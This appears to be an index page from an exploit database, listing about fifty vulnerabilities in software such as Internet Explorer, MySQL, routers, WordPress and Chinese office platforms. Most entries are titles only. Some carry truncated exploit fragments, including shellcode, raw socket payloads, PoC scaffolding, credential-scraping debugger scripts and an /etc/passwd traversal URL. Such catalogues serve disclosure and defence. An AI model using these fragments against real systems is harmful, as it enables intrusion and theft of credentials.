Ali wangwang 2010 remote code execution vulnerability
Vulnerability reproduction: The ImageMan.dll dynamic link library in Ali Wangwang 2010 contains a COM interface responsible for handling image information, and one of its functions, AutoPic, is vulnerable. When this COM interface is loaded from HTML and passed a specially crafted string, the string length is never checked, so the copy reads from an inaccessible address and the program enters SEH exception handling; an over-long payload can overwrite the SEH pointer, making EIP controllable. A detailed analysis of this vulnerability follows. First install Ali Wangwang 2010, then open it with IE; IE crashes. Attaching WinDbg reaches the crash location. a5c.628: Access violation - code c0000005 first chance...
Microsoft Internet Explorer 11.0.9600.18482 - Use After Free
No description provided by source. body background-color:lime; font-color:red; ; / Exploit Title: Internet Explorer 11 Use After Free Date: 05/09/2016 - 11/09/2016 Exploit Author: Marcin Ressel Vendor Homepage: https://www.microsoft.com/pl-pl/ Version: 11.0.9600.18482 Tested on: Windows 7 x64 0:0...
Tenda ADSL2/2+ Modem 963281TAN - unauthenticated remote DNS change
No description provided by source. if [ $# -gt 3 ] || [ $# -lt 2 ]; then echo " Tenda ADSL2/2+ Modem 963281TAN " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...
UF FE office platform /assetsGroupReport/vendorContacts.jsp parameter startDate injection vulnerability
No description provided by source. #!/usr/bin/env python # coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re import requests class TestPOC(POCBase): vulID = '' ssvid version = '1.0' author = '烽火戏诸侯' vulDate =...
LamaHub 0.0.62 remote code execution vulnerability
No description provided by source. import socket HOST = 'localhost' PORT = 4111 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) buf = "" buf += "\x24\x53\x75\x70\x70\x6f\x72\x74\x73\x20\x55\x73" buf += "\x6c\x6c\x6f\x20\x49\x50\x32\x20\x65\x61\x72\x63" buf +=...
Atlassian Confluence arbitrary file include Vulnerability (CVE-2015-8399)
Affected component: Atlassian Confluence. Atlassian Confluence versions earlier than 5.8.17 contain arbitrary file read and directory traversal vulnerabilities. /spaces/viewdefaultdecorator.action?decoratorName=. lists the current directory /spaces/viewdefaultdecorator...
Strongsoft FloodDisastersQueryContent.aspx parameter DirTypeDetailId SQL injection vulnerability
No description provided by source...
Strongsoft AjaxDeleteMsgInfo.ashx parameter msgid SQL injection vulnerability
No description provided by source...
PHPIPAM v1.1.010 Multiple Vulnerabilities
No description provided by source...
PHP 'bcmath.c' Multiple Local Heap Overflow Vulnerabilities
No description provided by source...
Web Idea Pakistan product.php parameter pID SQL Injection
No description provided by source...
VideoIQ Camera local file inclusion vulnerability
No description provided by source...
Navicat Premium 11.2.11 (64bit) Local Password Disclosure
No description provided by source...
PHP 5.0.0 - 'snmpwalkoid()' local denial of service
No description provided by source...
WordPress RB Agency Plugin 2.4.7 - local file inclusion
The vulnerability is in /ext/forcedownload.php http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd...
PHP 5.0.0 - 'fbird_[p]connect()' local denial of service
No description provided by source...
MySQL <= 5.7.15 remote Root code execution vulnerability
http://legalhackers.com - dawid at legalhackers.com - Release date: 12.09.2016 I. VULNERABILITY ------------------------- MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation 0day 5.6.33 5.5.52 MySQL clones are also affected, including: MariaDB PerconaDB II. BACKGROUND...
SugarCRM v6.5.23 PHP deserialization object injection vulnerability
Author: p0wd3r, Knownsec 404 Security Lab Date: 2016-09-12 0x00 vulnerability overview 1. Vulnerability description SugarCRM (http://www.sugarcrm.com/) is an open-source Customer Relationship Management system. Researchers recently found that versions <= 6.5.23 contain a deserialization...
UF FE /sysform/003/editflow_manager.jsp parameter UID injection vulnerability
No description provided by source...
MySQL 5.5.45 (64bit) - local credential information disclosure
No description provided by source. import time from winappdbg import Debug, Process def b2h(str): return ''.join("%02X " % ord(x) for x in str).strip() def h2b(str): bytes = []; str = ''.join(str.split(" ")); for i in range(0, len(str), 2): bytes.append(chr(int(str[i:i+2], 16))); return ''.join(bytes) usr = '' pwd = '' count = 0...
UF FE /flex/newsmessage.jsp parameter uname injection vulnerability
No description provided by source...
UF A6 /yyoa/assess/js/initDataAssess.jsp information disclosure
No description provided by source...
Adobe ColdFusion < 11 Update 10 - XML external entity injection
Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - APSB16-30 - Release date: 31.08.2016 I. VULNERABILITY Adobe ColdFusion <= 11 XML External Entity (XXE) Injection II. BACKGROUND "Adobe ColdFusion 11 Enterprise Edition offers a single platform to rapidly build and...
Weaver (泛微) OA /js/swfupload/swfupload.swf XSS vulnerability
No description provided by source...
ZKTeco ZKAccess Security System 5.3.1 - stored XSS
Application description: ZKAccess systems are built on flexible, open technology to provide management, real-time monitoring and control of your access control changes, accessed via a browser, without the need to install additional software. Centralized management of security infrastructure devices,...
Joomla Extra Search v2.2.8 SQL Injection
No description provided by source...
UF FE /admin/systemXml/system-bean.xml information disclosure vulnerability
No description provided by source...
UF FE /feform/createprinttemplete.jsp parameter formid injection vulnerability
No description provided by source...
Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery)
No description provided by source. import socket, sys, base64, struct, string, urllib from getopt import getopt as GetOpt, GetoptError from uuid import getnode as getmac import SimpleHTTPServer, SocketServer TIMELINE ''' 3/16/2016 - First Submission to Belkin no response 5/3/2016 - Second...
FortiClient SSLVPN 5.4 - credentials information disclosure
No description provided by source. from winappdbg import Debug, Process, HexDump import sys filename = "FortiTray.exe" # program name searchstring = "fortissl" # when user credentials are stored in process memory, emulate the offset # function that searches for user credentials def memorysearch(pid, strings): process = Process(pid) memdump =...
ZKTeco ZKBioSecurity 3.0 hard-coded login credentials and remote system command execution
No description provided by source...
ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) local authentication bypass
No description provided by source...
WordPress timthumb-config.php arbitrary file download
No description provided by source...
Joomla com_offices parameter file blind SQL injection vulnerability
No description provided by source...
Joomla com_jsjobs parameter oi SQL injection vulnerability
No description provided by source...
UF FE /feReport/chartList.jsp parameter reportId injection vulnerability
No description provided by source...
WordPress CYSTEME Finder plugin arbitrary file disclosure+upload vulnerability
No description provided by source...
UF FE office platform /security/role_add_user.jsp parameter searchValue SQL injection vulnerability
No description provided by source...
NScan 0.91 local code execution vulnerability
No description provided by source. import struct rp = struct.pack("L", 0x75658BD5) # JMP ESP kernel32 # Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit sc = "\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"...
ENOMSOFT product.php parameter id SQL Injection
No description provided by source...
qBit /pages/getPage parameter p SQL Injection
No description provided by source. #!/usr/bin/env python # coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re import random import hashlib class TestPOC(POCBase): vulID = '1' ssvid version = '1.0' author =...
PHP 5.0.0 - imap_mail() local denial of service
No description provided by source...
erduo music \source\user\blog\ajax.php variable content stored XSS
No description provided by source...
Simpla Admin v1.02 single-ads.php parameter ID SQL Injection
No description provided by source...
ESPCMS File Download information disclosure vulnerability
No description provided by source...
HelpDeskZ 1.0.2 unauthenticated shell upload
No description provided by source. ''' Exploit Title: HelpDeskZ /submitticketcontroller.php - Line 141 $filename = md5($_FILES['attachment']['name'].time()).".".$ext; So by guessing the time the file was uploaded, we can get RCE. Steps to reproduce:...
SIEMENS IP Cameras (various models) chklogin.cgi information disclosure vulnerability
No description provided by source...
WordPress Vertical Gallery plugin arbitrary file upload vulnerability
No description provided by source...
cmseasy /imageUp.php XSS vulnerability
No description provided by source...
WordPress Zero Spam <= 2.1.1 - unauthorized blind
No description provided by source...